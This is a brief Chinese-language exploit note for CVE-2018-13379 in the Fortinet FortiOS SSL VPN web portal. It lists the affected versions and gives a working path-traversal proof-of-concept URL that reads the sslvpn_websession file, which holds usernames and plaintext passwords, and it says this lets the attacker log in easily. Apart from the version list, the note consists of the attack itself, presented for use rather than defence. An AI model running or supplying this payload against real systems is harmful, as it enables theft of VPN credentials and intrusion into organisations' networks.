影响版本
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 under SSL VPN web portal
利用CVE-2018-13379来泄露会话文件。这个session文件中包含一些有价值的信息,比如用户名以及明文密码,这样我们就可以轻松登录。
poc
https://x.x.x.x/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession
这里我们需要猜一下哪个是用户名和密码